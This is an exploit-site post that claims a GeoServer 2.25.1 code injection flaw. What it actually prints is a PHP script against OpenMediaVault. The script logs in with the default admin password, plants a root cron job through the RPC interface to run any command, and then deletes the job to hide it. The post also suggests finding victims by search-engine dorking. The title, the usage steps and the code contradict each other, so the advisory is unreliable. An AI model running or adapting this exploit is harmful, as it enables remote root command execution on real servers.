Headline
GeoServer 2.25.1 Code Injection
GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : GeoServer 2.25.1 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://github.com/geoserver/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123 set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{ private $targetUri; private $username; private $password; private $persistent; private $cronUuid; private $versionNumber; public function __construct($targetUri, $username, $password, $persistent = false) { $this->targetUri = $targetUri; $this->username = $username; $this->password = $password; $this->persistent = $persistent; } private function sendRequest($url, $data) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json' ]); $response = curl_exec($ch); curl_close($ch); return json_decode($response, true); } public function login() { echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n"; $data = [ 'service' => 'Session', 'method' => 'login', 'params' => [ 'username' => $this->username, 'password' => $this->password ], 'options' => null ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); return isset($response['authenticated']) && $response['authenticated'] === true; } public function checkTarget() { echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n"; $data = [ 'service' => 'System', 'method' => 'getInformation', 'params' => null ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); return $response; } public function checkVersion($response) { if (!empty($response)) { $version = $response['response']['version'] ?? null; return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null; } return null; } public function executeCommand($cmd) { echo "Executing command...\n"; $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*'; $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4'; $data = [ 'service' => 'Cron', 'method' => 'set', 'params' => [ 'uuid' => $uuid, 'enable' => true, 'execution' => 'exactly', 'minute' => $schedule, 'hour' => $schedule, 'dayofmonth' => $schedule, 'month' => $schedule, 'dayofweek' => $schedule, 'username' => 'root', 'command' => $cmd, 'sendemail' => false, 'comment' => '', 'type' => 'userdefined' ], 'options' => null ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); $this->cronUuid = $response['response']['uuid'] ?? ''; $this->applyConfigChanges(); echo "Cron payload execution triggered.\n"; } public function applyConfigChanges() { $data = [ 'service' => 'Config', 'method' => 'applyChangesBg', 'params' => [ 'modules' => [], 'force' => false ], 'options' => null ]; $this->sendRequest($this->targetUri . '/rpc.php', $data); } public function removePayload() { if (!$this->persistent) { $data = [ 'service' => 'Cron', 'method' => 'delete', 'params' => [ 'uuid' => $this->cronUuid ] ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); if ($response) { $this->applyConfigChanges(); echo "Cron payload entry successfully removed.\n"; } else { echo "Cannot access cron services to remove payload.\n"; } } }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) { $response = $exploit->checkTarget(); if ($response) { $exploit->versionNumber = $exploit->checkVersion($response); $exploit->executeCommand('your-command-here'); $exploit->removePayload(); }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================